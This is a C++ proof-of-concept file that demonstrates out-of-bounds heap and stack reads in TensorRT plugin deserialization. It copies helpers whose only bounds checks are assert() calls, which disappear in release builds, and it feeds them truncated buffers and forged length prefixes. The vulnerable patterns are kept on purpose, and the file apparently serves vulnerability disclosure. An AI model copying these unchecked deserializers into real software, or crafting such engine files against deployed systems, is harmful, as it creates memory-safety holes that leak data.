/*
* PoC: Out-of-bounds heap read in TensorRT plugin deserialization
*
* Vulnerability: TensorRT's serialize.hpp uses assert()-only bounds checking,
* which is compiled out in release builds (NDEBUG defined). The read<T>()
* function in plugin.h has ZERO bounds checking. When a malicious TensorRT
* engine file (.trt/.engine/.plan) contains a plugin with truncated or
* crafted serialization data, the deserialization reads past the buffer
* boundary.
*
* This PoC demonstrates two bugs:
*
* 1. serialize.hpp vector deserialization (line 101-112):
* - Reads attacker-controlled `size` from buffer
* - Resizes vector to `size`
* - Computes nbyte = size * sizeof(T) (can overflow)
* - assert(*buffer_size >= nbyte) — NO-OP in release
* - memcpy from buffer with no bounds check
*
* 2. serialize.hpp string deserialization (line 128-138):
* - Reads attacker-controlled `nbyte` from buffer
* - Resizes string to nbyte
* - assert(*buffer_size >= nbyte) — NO-OP in release
* - memcpy from buffer with no bounds check
*
* Affected code:
* - TensorRT/plugin/common/serialize.hpp:55-61 (POD deserialize)
* - TensorRT/plugin/common/serialize.hpp:101-112 (vector deserialize)
* - TensorRT/plugin/common/serialize.hpp:128-138 (string deserialize)
* - TensorRT/plugin/common/plugin.h:100-108 (read<T>() — zero checks)
*
* All 30+ TensorRT plugins that use these primitives are affected.
*
* Build and run:
* # Debug (assert enabled — catches the bug):
* g++ -fsanitize=address -g -o poc_debug poc_tensorrt_serialize.cpp
* ./poc_debug
*
* # Release (assert disabled — ASAN catches OOB read):
* g++ -fsanitize=address -g -DNDEBUG -o poc_release poc_tensorrt_serialize.cpp
* ./poc_release
*/
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <iostream>
#include <string>
#include <type_traits>
#include <vector>
// ============================================================================
// Mirrors TensorRT/plugin/common/serialize.hpp. Every check, copy and cursor
// update is performed in the same order as in that header; only the spelling
// differs. The bounds checks are deliberately left as assert()-only.
// ============================================================================

// Appends `value` at `*buffer` and advances `*buffer` past the bytes written.
template <typename T>
inline void serialize_value(void** buffer, T const& value);

// Extracts a `T` from `*buffer` into `*value`, advances `*buffer` past the
// bytes consumed and subtracts that many bytes from `*buffer_size`.
template <typename T>
inline void deserialize_value(void const** buffer, size_t* buffer_size, T* value);

namespace
{

// Primary template: empty on purpose, so a type without a matching
// specialization fails to compile when one of its members is requested.
template <typename T, class Enable = void>
struct Serializer
{
};

// POD serializer (arithmetic and enum types) — assert-only bounds check.
template <typename T>
struct Serializer<T, std::enable_if_t<std::is_arithmetic_v<T> || std::is_enum_v<T>>>
{
    // Number of bytes one value occupies in the stream.
    static size_t serialized_size(T const&)
    {
        return sizeof(T);
    }

    // Copies the object representation of `value` to the write cursor.
    static void serialize(void** buffer, T const& value)
    {
        char* const dst = static_cast<char*>(*buffer);
        std::memcpy(dst, &value, sizeof(T));
        *buffer = dst + sizeof(T);
    }

    // Copies sizeof(T) bytes from the read cursor into `*value`.
    static void deserialize(void const** buffer, size_t* buffer_size, T* value)
    {
        // The only guard against a short buffer; NO-OP when NDEBUG is defined!
        assert(*buffer_size >= sizeof(T));
        char const* const src = static_cast<char const*>(*buffer);
        std::memcpy(value, src, sizeof(T));
        *buffer = src + sizeof(T);
        *buffer_size = *buffer_size - sizeof(T);
    }
};

// Vector serializer — assert-only bounds check + potential integer overflow
// in the `count * sizeof(T)` byte computation.
template <typename T>
struct Serializer<std::vector<T>, std::enable_if_t<std::is_arithmetic_v<T> || std::is_enum_v<T>>>
{
    // Element-count prefix followed by the packed elements.
    static size_t serialized_size(std::vector<T> const& value)
    {
        return sizeof(value.size()) + value.size() * sizeof(T);
    }

    // Writes the element count, then the raw element bytes.
    static void serialize(void** buffer, std::vector<T> const& value)
    {
        size_t const count = value.size();
        serialize_value(buffer, count);
        size_t const payload = count * sizeof(T);
        char* const dst = static_cast<char*>(*buffer);
        std::memcpy(dst, value.data(), payload);
        *buffer = dst + payload;
    }

    // Reads the element count from the stream, resizes `*value` to it, then
    // copies that many elements out of the stream.
    static void deserialize(void const** buffer, size_t* buffer_size, std::vector<T>* value)
    {
        size_t count = 0;
        deserialize_value(buffer, buffer_size, &count);
        value->resize(count);
        size_t const payload = value->size() * sizeof(T);
        // The only guard against a short buffer; NO-OP when NDEBUG is defined!
        assert(*buffer_size >= payload);
        char const* const src = static_cast<char const*>(*buffer);
        std::memcpy(value->data(), src, payload);
        *buffer = src + payload;
        *buffer_size = *buffer_size - payload;
    }
};

// String serializer — assert-only bounds check.
template <>
struct Serializer<std::string>
{
    // Length prefix followed by the characters (no terminator).
    static size_t serialized_size(std::string const& value)
    {
        return sizeof(value.size()) + value.size();
    }

    // Writes the length, then the characters.
    static void serialize(void** buffer, std::string const& value)
    {
        size_t const length = value.size();
        serialize_value(buffer, length);
        char* const dst = static_cast<char*>(*buffer);
        std::memcpy(dst, value.data(), length);
        *buffer = dst + length;
    }

    // Reads the length from the stream, resizes `*value` to it, then copies
    // that many characters out of the stream.
    static void deserialize(void const** buffer, size_t* buffer_size, std::string* value)
    {
        size_t length = 0;
        deserialize_value(buffer, buffer_size, &length);
        value->resize(length);
        assert(value->size() == length);
        // The only guard against a short buffer; NO-OP when NDEBUG is defined!
        assert(*buffer_size >= length);
        char const* const src = static_cast<char const*>(*buffer);
        std::memcpy(value->data(), src, length);
        *buffer = src + length;
        *buffer_size = *buffer_size - length;
    }
};

} // namespace

// Dispatches to the Serializer specialization selected by T.
template <typename T>
inline void serialize_value(void** buffer, T const& value)
{
    Serializer<T>::serialize(buffer, value);
}

// Dispatches to the Serializer specialization selected by T.
template <typename T>
inline void deserialize_value(void const** buffer, size_t* buffer_size, T* value)
{
    Serializer<T>::deserialize(buffer, buffer_size, value);
}
// ============================================================================
// Mirrors read<T>() from TensorRT/plugin/common/plugin.h. Same behavior as
// that helper: the cursor carries no length, so nothing here can check bounds.
// ============================================================================

// Copies sizeof(OutType) bytes starting at `buffer` into a value-initialized
// OutType, moves `buffer` forward by that many bytes, and returns the value.
// BufferType must be a one-byte type so pointer arithmetic counts bytes.
template <typename OutType, typename BufferType>
OutType read(BufferType const*& buffer)
{
    static_assert(sizeof(BufferType) == 1, "BufferType must be a 1 byte type.");
    BufferType const* const src = buffer;
    buffer = src + sizeof(OutType);
    OutType result{};
    std::memcpy(&result, static_cast<void const*>(src), sizeof(OutType));
    return result;
}
// ============================================================================
// PoC: Simulate deserializing a malicious plugin from a truncated buffer
// ============================================================================
// Simulates the FlattenConcat plugin deserialization pattern (flattenConcat.cpp:59-78)
// against a truncated/malicious buffer, using the unchecked read<T>() helper.
//
// Buffer layout (16 bytes on the stack, pre-filled with 'A'):
//   offset  0: bool    mIgnoreBatch      = false (1 byte)
//   offset  1: int32_t mConcatAxisID     = 1     (4 bytes)
//   offset  5: int32_t mOutputConcatAxis = 0     (4 bytes)
//   offset  9: int32_t mNumInputs        = 1000  (4 bytes, attacker-controlled)
//   offset 13: 3 bytes of 'A' filler
//
// The first four reads consume 13 bytes and stay in bounds. The fifth read asks
// for 4 bytes when only 3 remain, so it reads 1 byte past the end of `buffer`.
// That last read is intentional undefined behavior: it is what the PoC exists
// to demonstrate.
void poc_read_oob()
{
    // std::endl is used on purpose throughout: each line is flushed before the
    // out-of-bounds read, so the output survives if the process is aborted.
    std::cout << "\n=== PoC 1: read<T>() OOB read (plugin.h pattern) ===" << std::endl;
    std::cout << "Simulating FlattenConcat plugin deserialization with truncated buffer\n" << std::endl;

    char buffer[16];
    std::memset(buffer, 0x41, sizeof(buffer)); // Fill with 'A' for visibility

    // Fields are packed at unaligned offsets, so they are stored with memcpy;
    // writing through a casted int32_t* at offset 1 would be a misaligned store.
    char* wp = buffer;
    auto const put = [&wp](auto const& field) {
        std::memcpy(wp, &field, sizeof(field));
        wp += sizeof(field);
    };
    put(false);                      // mIgnoreBatch
    put(static_cast<int32_t>(1));    // mConcatAxisID
    put(static_cast<int32_t>(0));    // mOutputConcatAxis
    put(static_cast<int32_t>(1000)); // mNumInputs (attacker-controlled)
    // 13 bytes written; the remaining 3 bytes cannot hold even one int32 input.

    char const* d = buffer;
    bool const ignoreBatch = read<bool>(d);
    int32_t const concatAxisID = read<int32_t>(d);
    int32_t const outputConcatAxis = read<int32_t>(d);
    int32_t const numInputs = read<int32_t>(d); // bytes 9..12 — still in bounds
    std::cout << "ignoreBatch=" << ignoreBatch << " concatAxisID=" << concatAxisID
              << " outputConcatAxis=" << outputConcatAxis << " numInputs=" << numInputs << std::endl;

    // A real plugin would now read numInputs more int32 values. The very first
    // of them already runs off the end: bytes 13..16 of a 16-byte buffer.
    std::cout << "Next read goes OOB..." << std::endl;
    int32_t const oob_value = read<int32_t>(d); // <-- STACK BUFFER OVER-READ (1 byte past the end)
    std::cout << "OOB read value: " << oob_value << std::endl;
}
// Demonstrates Serializer<std::string>::deserialize with a crafted length prefix.
//
// The heap buffer holds a size_t length field claiming 256 bytes, followed by
// only 8 bytes of actual string data. deserialize_value() then:
//   1. reads the length (256) and leaves `remaining` at 8,
//   2. resizes the string to 256,
//   3. evaluates assert(remaining >= 256) — aborts in debug, NO-OP with NDEBUG,
//   4. memcpy's 256 bytes out of the 8 that remain -> out-of-bounds heap read,
//   5. subtracts 256 from `remaining` (8), which wraps around as size_t.
// Steps 4-5 are intentional undefined behavior: they are what the PoC exists
// to demonstrate.
void poc_string_deserialize_oob()
{
    // std::endl is used on purpose throughout: each line is flushed before the
    // faulty call, so the output survives if the process is aborted.
    std::cout << "\n=== PoC 2: String deserialization OOB (serialize.hpp) ===" << std::endl;

    size_t const fake_length = 256; // claim the string is 256 bytes
    size_t const actual_data = 8;   // but only provide 8 bytes after the length field

    // Exactly-sized heap allocation, owned by the vector so it is released on
    // every exit path. Pre-filled with 'B'; the length field overwrites the front.
    std::vector<char> buffer(sizeof(size_t) + actual_data, 'B');
    std::memcpy(buffer.data(), &fake_length, sizeof(fake_length));

    void const* ptr = buffer.data();
    size_t remaining = buffer.size();
    std::string result;
#ifdef NDEBUG
    std::cout << "NDEBUG defined — assert() is disabled, OOB read will occur" << std::endl;
#else
    std::cout << "NDEBUG not defined — assert() will catch the bug (this is expected in debug)" << std::endl;
    std::cout << "Recompile with -DNDEBUG to see the OOB read" << std::endl;
#endif
    deserialize_value(&ptr, &remaining, &result);

    std::cout << "String length: " << result.size() << std::endl;
    std::cout << "First 8 chars: " << result.substr(0, 8) << std::endl;
}
// Entry point: prints the build mode, then runs the selected PoC(s).
//
// Usage: <program> [1|2|all]
//   1    run only poc_read_oob()
//   2    run only poc_string_deserialize_oob()
//   all  run both, in that order (default; same as passing no argument)
//
// The selector exists because the first PoC can end the process: a sanitizer
// that stops at its first report (AddressSanitizer's default) aborts inside
// poc_read_oob(), so the second PoC would otherwise never be reachable in
// that build.
//
// Returns 0 when the selected PoC(s) ran to completion, 2 on an unknown selector.
int main(int argc, char** argv)
{
    // std::endl is deliberate: flush before code that may abort the process.
    std::cout << "TensorRT Plugin Deserialization PoC" << std::endl;
    std::cout << "====================================" << std::endl;
#ifdef NDEBUG
    std::cout << "Build mode: RELEASE (NDEBUG defined — assert() disabled)" << std::endl;
#else
    std::cout << "Build mode: DEBUG (assert() enabled)" << std::endl;
#endif

    std::string const selector = (argc > 1) ? argv[1] : "all";
    bool const run_read = (selector == "all") || (selector == "1");
    bool const run_string = (selector == "all") || (selector == "2");
    if (!run_read && !run_string)
    {
        std::cerr << "usage: " << argv[0] << " [1|2|all]" << std::endl;
        return 2;
    }

    if (run_read)
    {
        poc_read_oob();
    }
    if (run_string)
    {
        poc_string_deserialize_oob();
    }
    return 0;
}
|